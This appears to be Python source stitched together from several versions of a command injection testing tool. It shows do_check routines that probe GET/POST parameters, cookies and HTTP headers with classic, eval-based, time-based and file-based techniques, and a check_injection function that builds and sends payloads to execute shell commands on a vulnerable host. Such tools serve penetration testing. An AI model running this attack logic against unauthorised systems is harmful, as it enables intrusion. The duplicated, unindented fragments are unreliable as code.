exploitation(ip_dst, ip_src, url, http_request_method, vuln_parameter,
technique)
def do_check(url, filename):
classic_state = False
eval_based_state = False
time_based_state = False
file_based_state = False
# Check if defined "--delay" option.
if menu.options.delay:
delay = menu.options.delay
else:
delay = settings.DELAY
# Check if authentication is needed.
if menu.options.auth_url and menu.options.auth_data:
# Do the authentication process.
authentication.authentication_process()
# Check if authentication page is the same with the next (injection) URL
if urllib2.urlopen(url).read() == urllib2.urlopen(
menu.options.auth_url).read():
print Back.RED + settings.ERROR_SIGN + "It seems that the authentication procedure has failed." + Style.RESET_ALL
sys.exit(0)
elif menu.options.auth_url or menu.options.auth_data:
print Back.RED + settings.ERROR_SIGN + "You must specify both login panel URL and login parameters." + Style.RESET_ALL
sys.exit(0)
else:
pass
# Check if HTTP Method is GET or POST.
header_name = ""
if not menu.options.data:
http_request_method = "GET"
if not settings.COOKIE_INJECTION \
and not settings.USER_AGENT_INJECTION \
and not settings.REFERER_INJECTION:
url = parameters.do_GET_check(url)
check_parameter = parameters.vuln_GET_param(url)
the_type = " parameter "
else:
http_request_method = "POST"
parameter = menu.options.data
parameter = parameters.do_POST_check(parameter)
check_parameter = parameters.vuln_POST_param(parameter, url)
the_type = " parameter "
# Load modules
modules_handler.load_modules(url, http_request_method, filename)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
settings.HTTP_HEADER = header_name[1:].lower()
check_parameter = parameters.specify_cookie_parameter(
menu.options.cookie)
the_type = " HTTP header "
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
settings.HTTP_HEADER = header_name[1:].replace("-", "").lower()
check_parameter = ""
the_type = " HTTP header "
# Referer Injection
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
settings.HTTP_HEADER = header_name[1:].lower()
check_parameter = ""
the_type = " HTTP header "
if len(check_parameter) > 0:
settings.TESTABLE_PARAMETER = check_parameter
# Check for session file
if not menu.options.ignore_session:
if os.path.isfile(settings.SESSION_FILE):
if not menu.options.tech:
menu.options.tech = session_handler.applied_techniques(
url, http_request_method)
if session_handler.check_stored_parameter(url,
http_request_method):
settings.LOAD_SESSION = True
if menu.options.flush_session:
session_handler.flush(url)
if len(check_parameter) != 0:
check_parameter = " '" + check_parameter + "'"
print settings.INFO_SIGN + "Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."
# Estimating the response time (in seconds)
delay, url_time_response = requests.estimate_response_time(
url, http_request_method, delay)
# Check if it is vulnerable to classic command injection technique.
if not menu.options.tech or "c" in menu.options.tech:
if cb_handler.exploitation(url, delay, filename,
http_request_method) != False:
classic_state = True
else:
classic_state = False
# Check if it is vulnerable to eval-based code injection technique.
if not menu.options.tech or "e" in menu.options.tech:
if eb_handler.exploitation(url, delay, filename,
http_request_method) != False:
eval_based_state = True
else:
eval_based_state = False
# Check if it is vulnerable to time-based blind command injection technique.
if not menu.options.tech or "t" in menu.options.tech:
if tb_handler.exploitation(url, delay, filename, http_request_method,
url_time_response) != False:
time_based_state = True
else:
time_based_state = False
# Check if it is vulnerable to file-based semiblind command injection technique.
if not menu.options.tech or "f" in menu.options.tech:
if fb_handler.exploitation(url, delay, filename, http_request_method,
url_time_response) != False:
file_based_state = True
else:
file_based_state = False
if classic_state == eval_based_state == time_based_state == file_based_state == False:
info_msg = settings.CRITICAL_SIGN + "The tested (" + http_request_method + ")" + check_parameter + " parameter appear to be not injectable."
if not menu.options.alter_shell:
info_msg += " Use the option '--alter-shell'"
else:
info_msg += " Remove the option '--alter-shell'"
info_msg += " and/or try to audit the HTTP headers (i.e 'User-Agent', 'Referer', 'Cookie' etc)."
print Back.RED + info_msg + Style.RESET_ALL
sys.exit(0)
def do_check(url, filename):
classic_state = False
eval_based_state = False
time_based_state = False
file_based_state = False
# Check if defined "--delay" option.
if menu.options.delay:
delay = menu.options.delay
else:
delay = settings.DELAY
# Check if authentication is needed.
if menu.options.auth_url and menu.options.auth_data:
# Do the authentication process.
authentication.authentication_process()
# Check if authentication page is the same with the next (injection) URL
if urllib2.urlopen(url).read() == urllib2.urlopen(menu.options.auth_url).read():
print Back.RED + settings.ERROR_SIGN + "It seems that the authentication procedure has failed." + Style.RESET_ALL
sys.exit(0)
elif menu.options.auth_url or menu.options.auth_data:
print Back.RED + settings.ERROR_SIGN + "You must specify both login panel URL and login parameters." + Style.RESET_ALL
sys.exit(0)
else:
pass
# Check if HTTP Method is GET or POST.
header_name = ""
if not menu.options.data:
http_request_method = "GET"
if not settings.COOKIE_INJECTION \
and not settings.USER_AGENT_INJECTION \
and not settings.REFERER_INJECTION:
url = parameters.do_GET_check(url)
check_parameter = parameters.vuln_GET_param(url)
the_type = " parameter "
else:
http_request_method = "POST"
parameter = menu.options.data
parameter = parameters.do_POST_check(parameter)
check_parameter = parameters.vuln_POST_param(parameter, url)
the_type = " parameter "
# Load modules
modules_handler.load_modules(url, http_request_method, filename)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
settings.HTTP_HEADER = header_name[1:].lower()
check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
the_type = " HTTP header "
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
settings.HTTP_HEADER = header_name[1:].replace("-","").lower()
check_parameter = ""
the_type = " HTTP header "
# Referer Injection
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
settings.HTTP_HEADER = header_name[1:].lower()
check_parameter = ""
the_type = " HTTP header "
if len(check_parameter) > 0:
settings.TESTABLE_PARAMETER = check_parameter
# Check for session file
if not menu.options.ignore_session:
if os.path.isfile(settings.SESSION_FILE):
if not menu.options.tech:
menu.options.tech = session_handler.applied_techniques(url, http_request_method)
if session_handler.check_stored_parameter(url, http_request_method):
settings.LOAD_SESSION = True
if menu.options.flush_session:
session_handler.flush(url)
if len(check_parameter) != 0 :
check_parameter = " '" + check_parameter + "'"
print settings.INFO_SIGN + "Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."
# Estimating the response time (in seconds)
delay, url_time_response = requests.estimate_response_time(url, http_request_method, delay)
# Check if it is vulnerable to classic command injection technique.
if not menu.options.tech or "c" in menu.options.tech:
if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
classic_state = True
else:
classic_state = False
# Check if it is vulnerable to eval-based code injection technique.
if not menu.options.tech or "e" in menu.options.tech:
if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
eval_based_state = True
else:
eval_based_state = False
# Check if it is vulnerable to time-based blind command injection technique.
if not menu.options.tech or "t" in menu.options.tech:
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
time_based_state = True
else:
time_based_state = False
# Check if it is vulnerable to file-based semiblind command injection technique.
if not menu.options.tech or "f" in menu.options.tech:
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
file_based_state = True
else:
file_based_state = False
if classic_state == eval_based_state == time_based_state == file_based_state == False :
info_msg = settings.CRITICAL_SIGN + "The tested (" + http_request_method + ")" + check_parameter + " parameter appear to be not injectable."
if not menu.options.alter_shell :
info_msg += " Use the option '--alter-shell'"
else:
info_msg += " Remove the option '--alter-shell'"
info_msg += " and/or try to audit the HTTP headers (i.e 'User-Agent', 'Referer', 'Cookie' etc)."
print Back.RED + info_msg + Style.RESET_ALL
sys.exit(0)
def do_check(url, filename):
check_http_headers = False
# Check if defined "--delay" option.
if menu.options.delay:
delay = menu.options.delay
else:
delay = settings.DELAY
# Check if authentication is needed.
if menu.options.auth_url and menu.options.auth_data:
# Do the authentication process.
authentication.authentication_process()
# Check if authentication page is the same with the next (injection) URL
if urllib2.urlopen(url).read() == urllib2.urlopen(menu.options.auth_url).read():
print Back.RED + settings.ERROR_SIGN + "It seems that the authentication procedure has failed." + Style.RESET_ALL
sys.exit(0)
elif menu.options.auth_url or menu.options.auth_data:
print Back.RED + settings.ERROR_SIGN + "You must specify both login panel URL and login parameters." + Style.RESET_ALL
sys.exit(0)
else:
pass
# Check if HTTP Method is GET.
if not menu.options.data:
# Enable Cookie Injection
if menu.options.cookie and menu.options.level > 1:
settings.COOKIE_INJECTION = True
http_request_method = "GET"
# Check for stored injections on User-agent / Referer headers (if level > 2).
if menu.options.level > 2 :
check_parameter = ""
stored_http_header_injection(url, check_parameter, check_http_headers, http_request_method, filename, delay)
# Enable Cookie Injection
if menu.options.cookie:
settings.COOKIE_INJECTION = True
if not settings.COOKIE_INJECTION:
found_url = parameters.do_GET_check(url)
if found_url != False:
for i in range(0, len(found_url)):
url = found_url[i]
check_parameter = parameters.vuln_GET_param(url)
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
# Check for session file
if check_for_stored_sessions(url, http_request_method):
injection_proccess(url, check_parameter, http_request_method, filename, delay)
else:
if check_for_stored_sessions(url, http_request_method):
injection_proccess(url, check_parameter, http_request_method, filename, delay)
if not settings.LOAD_SESSION :
for i in range(0, len(found_url)):
url = found_url[i]
check_parameter = parameters.vuln_GET_param(url)
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
injection_proccess(url, check_parameter, http_request_method, filename, delay)
else:
injection_proccess(url, check_parameter, http_request_method, filename, delay)
# Check if HTTP Method is POST.
else:
http_request_method = "POST"
# Check for stored injections on User-agent / Referer headers (if level > 2).
if menu.options.level > 2 :
check_parameter = ""
stored_http_header_injection(url, check_parameter, check_http_headers, http_request_method, filename, delay)
# Check if HTTP Method is POST.
parameter = menu.options.data
found_parameter = parameters.do_POST_check(parameter)
# Remove whitespaces
# Check if singe entry parameter
if type(found_parameter) is str:
found_parameter_list = []
found_parameter_list.append(found_parameter)
found_parameter = found_parameter_list
# Remove whitespaces
found_parameter = [x.replace(" ", "") for x in found_parameter]
# Check if multiple parameters
for i in range(0, len(found_parameter)):
parameter = menu.options.data = found_parameter[i]
check_parameter = parameters.vuln_POST_param(parameter, url)
if len(check_parameter) > 0:
settings.TESTABLE_PARAMETER = check_parameter
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
# Check for session file
if check_for_stored_sessions(url, http_request_method):
injection_proccess(url, check_parameter, http_request_method, filename, delay)
else:
if check_for_stored_sessions(url, http_request_method):
injection_proccess(url, check_parameter, http_request_method, filename, delay)
if not settings.LOAD_SESSION :
for i in range(0, len(found_parameter)):
parameter = menu.options.data = found_parameter[i]
check_parameter = parameters.vuln_POST_param(parameter, url)
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
injection_proccess(url, check_parameter, http_request_method, filename, delay)
else:
injection_proccess(url, check_parameter, http_request_method, filename, delay)
# Enable Cookie Injection
if menu.options.cookie and menu.options.level > 1:
settings.COOKIE_INJECTION = True
# Cookie Injection
if settings.COOKIE_INJECTION == True:
cookie_value = menu.options.cookie
# Check for stored injections on User-agent / Referer headers (if level > 2).
if menu.options.level > 2 :
check_parameter = ""
stored_http_header_injection(url, check_parameter, check_http_headers, http_request_method, filename, delay)
header_name = " Cookie"
settings.HTTP_HEADER = header_name[1:].lower()
cookie_parameters = parameters.do_cookie_check(menu.options.cookie)
if type(cookie_parameters) is str:
cookie_parameters_list = []
cookie_parameters_list.append(cookie_parameters)
cookie_parameters = cookie_parameters_list
# Remove whitespaces
cookie_parameters = [x.replace(" ", "") for x in cookie_parameters]
for i in range(0, len(cookie_parameters)):
menu.options.cookie = cookie_parameters[i]
check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
if len(check_parameter) > 0:
settings.TESTABLE_PARAMETER = check_parameter
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
# Check for session file
if check_for_stored_sessions(url, http_request_method):
injection_proccess(url, check_parameter, http_request_method, filename, delay)
else:
if check_for_stored_sessions(url, http_request_method):
injection_proccess(url, check_parameter, http_request_method, filename, delay)
if not settings.LOAD_SESSION :
for i in range(0, len(cookie_parameters)):
menu.options.cookie = cookie_parameters[i]
check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
if len(check_parameter) > 0:
settings.TESTABLE_PARAMETER = check_parameter
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
injection_proccess(url, check_parameter, http_request_method, filename, delay)
else:
injection_proccess(url, check_parameter, http_request_method, filename, delay)
if settings.COOKIE_INJECTION == True:
# Restore cookie value
menu.options.cookie = cookie_value
# Disable cookie injection
settings.COOKIE_INJECTION = False
# Custom header Injection
if settings.CUSTOM_HEADER_INJECTION == True:
check_parameter = header_name = " " + settings.CUSTOM_HEADER_NAME
settings.HTTP_HEADER = header_name[1:].lower()
check_for_stored_sessions(url, http_request_method)
injection_proccess(url, check_parameter, http_request_method, filename, delay)
# Check for stored injections on User-agent / Referer headers (if level > 2).
if menu.options.level > 2 :
check_parameter = ""
check_http_headers = True
stored_http_header_injection(url, check_parameter, check_http_headers, http_request_method, filename, delay)
# All injection techniques seems to be failed!
if settings.CLASSIC_STATE == settings.EVAL_BASED_STATE == settings.TIME_BASED_STATE == settings.FILE_BASED_STATE == False :
info_msg = settings.CRITICAL_SIGN + "All the tested (" + http_request_method + ") parameters appear to be not injectable."
if not menu.options.alter_shell :
info_msg += " Try to use the option '--alter-shell'"
else:
info_msg += " Try to remove the option '--alter-shell'"
if menu.options.level < 3 :
info_msg += " and/or try to increase '--level' values to perform more tests (i.e 'User-Agent', 'Referer', 'Cookie' etc)"
info_msg += "."
print Back.RED + info_msg + Style.RESET_ALL
sys.exit(0)
#eof
def check_injection(separator, payload, TAG, cmd, prefix, suffix,
whitespace, http_request_method, url, vuln_parameter,
OUTPUT_TEXTFILE, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = fb_payloads.cmd_execution_alter_shell(
separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd,
OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(settings.SINGLE_WHITESPACE, whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL != 0:
payload_msg = payload.replace("\n", "\\n")
if settings.COMMENT in payload_msg:
payload = payload.split(settings.COMMENT)[0].strip()
payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
debug_msg = "Executing the '" + cmd.split(
settings.COMMENT)[0].strip() + "' command. "
sys.stdout.write(settings.print_debug_msg(debug_msg))
sys.stdout.flush()
output_payload = "\n" + settings.print_payload(payload)
if settings.VERBOSITY_LEVEL != 0:
output_payload = output_payload + "\n"
sys.stdout.write(output_payload)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined host with "INJECT_HERE" tag
elif menu.options.host and settings.INJECT_TAG in menu.options.host:
response = host_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter,
payload)
else:
# Check if defined POST data
if not settings.USER_DEFINED_POST_DATA:
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url, http_request_method)
payload = payload.replace(" ", "%20")
target = url.replace(settings.INJECT_TAG, payload)
vuln_parameter = ''.join(vuln_parameter)
request = _urllib.request.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
else:
# Check if defined method is POST.
parameter = menu.options.data
parameter = _urllib.parse.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter,
http_request_method)
parameter = ''.join(str(e)
for e in parameter).replace("+", "%2B")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Define the POST data
if settings.IS_JSON:
data = parameter.replace(
settings.INJECT_TAG,
_urllib.parse.unquote(payload.replace("\"", "\\\"")))
try:
data = checks.json_data(data)
except ValueError:
pass
elif settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG,
_urllib.parse.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = _urllib.request.Request(
url, data.encode(settings.DEFAULT_CODEC))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
return response